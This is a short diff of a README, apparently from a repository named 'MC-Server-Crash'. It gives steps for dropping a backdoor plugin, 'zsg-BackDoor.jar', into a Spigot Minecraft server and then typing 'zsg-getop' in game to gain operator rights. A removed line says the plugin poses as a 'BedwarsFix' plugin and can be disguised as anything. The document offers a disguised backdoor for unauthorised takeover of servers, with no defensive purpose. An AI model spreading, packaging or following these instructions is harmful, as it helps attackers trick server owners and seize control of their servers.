Imzsg/MC-Server-Crash/README.md

 1.Drag "zsg-BackDoor.jar" into the "Plugins"

-2.It will pretend as a BedwarsFix plugins，but you can replace it to anythings

-3.Enter the game,type "zsg-getop"
+2.Enter the game,type "zsg-getop"

-4.Now you are OPERATOR !!!!!!!
+3.Now you are Operator !!

 Tips:it is suit all versions of Spigot server.